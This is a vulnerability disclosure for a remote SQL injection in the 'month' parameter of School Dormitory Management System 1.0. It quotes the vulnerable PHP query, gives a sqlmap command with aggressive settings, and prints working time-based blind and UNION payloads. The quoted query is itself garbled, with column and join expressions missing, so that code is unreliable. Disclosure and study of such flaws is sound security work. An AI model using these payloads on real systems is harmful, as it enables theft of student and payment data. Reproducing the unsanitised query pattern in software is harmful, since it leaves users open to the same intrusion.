School Dormitory Management System 1.0 SQL Injection

School Dormitory Management System version 1.0 suffers from a remote SQL injection vulnerability.

SHA-256 | 35eface303d338348fb6d3c2744228b1f44d4ff33f83a1ac39f419a593227e06

# Exploit Title: School Dormitory Management System - 'month' SQL Injection
# Date: 08/05/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: XAMPP, Linux

# Vulnerable Code

line 59 in file "/dms/admin/reports/daily_collection_report.php"

$qry = $conn->query("SELECT p.*, a.code, s.code as student_code, concat(s.firstname, ' ', coalesce(concat(s.middlename,' '), ''), s.lastname) as `student`, as dorm, as `room` from payment_list p inner join account_list a on p.account_id = inner join student_list s on a.student_id = inner join room_list r on a.room_id = inner join dorm_list d on r.dorm_id = where (p.month_of) = '{$month}' order by student asc ");

# Sqlmap command:

sqlmap -u "http://localhost/dms/admin/?month=1&page=reports/daily_collection_report" -p month --level=5 --risk=3 --dbs --random-agent --eta

# Output:

Parameter: month (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: month=1' AND (SELECT 3271 FROM (SELECT(SLEEP(5)))duQT) AND 'NgBP'='NgBP&page=reports/daily_collection_report

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: month=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626b6a71,0x485362486f7266597a444d417754744873427366706c4a4f706b7949467a6a61505468424c476753,0x716b6a7171),NULL,NULL,NULL,NULL-- -&page=reports/daily_collection_report

Related Posts